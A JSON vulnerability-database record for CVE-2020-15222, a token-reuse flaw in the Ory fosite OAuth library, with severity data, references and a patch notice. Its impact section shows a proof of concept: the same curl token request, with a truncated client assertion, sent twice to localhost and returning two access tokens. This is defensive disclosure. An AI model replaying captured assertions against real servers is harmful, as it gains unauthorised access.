{"id":"CVE-2020-15222","aliases":["GHSA-v3q9-2p3m-7g43","GO-2021-0110"],"title":"Token reuse in Ory fosite","summary":"Token reuse in Ory fosite","severity":"high","cvss":8.1,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N","vendor":"ory","product":"github.com/ory/fosite","ecosystem":"go","affected":["github.com/ory/fosite < 0.31.0"],"patched":["github.com/ory/fosite 0.31.0"],"published":"2021-05-24","updated":"2026-07-08","source":"OSV","sourceUrl":"https://osv.dev/vulnerability/GHSA-v3q9-2p3m-7g43","references":[{"url":"https://github.com/ory/fosite/security/advisories/GHSA-v3q9-2p3m-7g43"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2020-15222"},{"url":"https://github.com/ory/fosite/commit/0c9e0f6d654913ad57c507dd9a36631e1858a3e9"},{"url":"https://github.com/ory/fosite"},{"url":"https://github.com/ory/fosite/releases/tag/v0.31.0"},{"url":"https://openid.net/specs/openid-connect-core-1_0.html#ClientAuthentication"},{"url":"https://pkg.go.dev/vuln/GO-2021-0110"}],"tags":["osv","go"],"epss":0.00867,"epssPercentile":0.56935,"ingestedAt":"2026-07-09T18:56:36.918Z","slug":"CVE-2020-15222","body":"## Overview\n\n### Impact\n\nWhen using client authentication method \"private_key_jwt\" [[1]](https://openid.net/specs/openid-connect-core-1_0.html#ClientAuthentication), OpenId specification says the following about assertion `jti`:\n\n> A unique identifier for the token, which can be used to prevent reuse of the token. These tokens MUST only be used once, unless conditions for reuse were negotiated between the parties\n\nHydra does not seem to check the uniqueness of this `jti` value. Here is me sending the same token request twice, hence with the same `jti` assertion, and getting two access tokens:\n\n```\n$ curl --insecure --location --request POST 'https://localhost/_/oauth2/token' \\\n   --header 'Content-Type: application/x-www-form-urlencoded' \\\n   --data-urlencode 'grant_type=client_credentials' \\\n   --data-urlencode 'client_id=c001d00d-5ecc-beef-ca4e-b00b1e54a111' \\\n   --data-urlencode 'scope=application openid' \\\n   --data-urlencode 'client_assertion_type=urn:ietf:params:oauth:client-assertion-type:jwt-bearer' \\\n   --data-urlencode 'client_assertion=eyJhb [...] jTw'\n{\"access_token\":\"zeG0NoqOtlACl8q5J6A-TIsNegQRRUzqLZaYrQtoBZQ.VR6iUcJQYp3u_j7pwvL7YtPqGhtyQe5OhnBE2KCp5pM\",\"expires_in\":3599,\"scope\":\"application openid\",\"token_type\":\"bearer\"}⏎\n$ curl --insecure --location --request POST 'https://localhost/_/oauth2/token' \\\n   --header 'Content-Type: application/x-www-form-urlencoded' \\\n   --data-urlencode 'grant_type=client_credentials' \\\n   --data-urlencode 'client_id=c001d00d-5ecc-beef-ca4e-b00b1e54a111' \\\n   --data-urlencode 'scope=application openid' \\\n   --data-urlencode 'client_assertion_type=urn:ietf:params:oauth:client-assertion-type:jwt-bearer' \\\n   --data-urlencode 'client_assertion=eyJhb [...] jTw'\n{\"access_token\":\"wOYtgCLxLXlELORrwZlmeiqqMQ4kRzV-STU2_Sollas.mwlQGCZWXN7G2IoegUe1P0Vw5iGoKrkOzOaplhMSjm4\",\"expires_in\":3599,\"scope\":\"application openid\",\"token_type\":\"bearer\"}\n```\n\n### Patches\n\nThis issue is patched in 0.31.0.\n\n### Workarounds\n\nDo not allow clients to use `private_key_jwt`.\n\n### References\n\nhttps://openid.net/specs/openid-connect-core-1_0.html#ClientAuthentication\n\n## Affected packages\n\n- `github.com/ory/fosite < 0.31.0`\n\n## Remediation\n\nUpgrade to a patched release:\n\n- `github.com/ory/fosite 0.31.0`","depth":"twilight","depthScore":45,"depthScoreParts":{"impact":44.6,"likelihood":0.2,"exploitation":0,"ransomware":0},"changes":[]}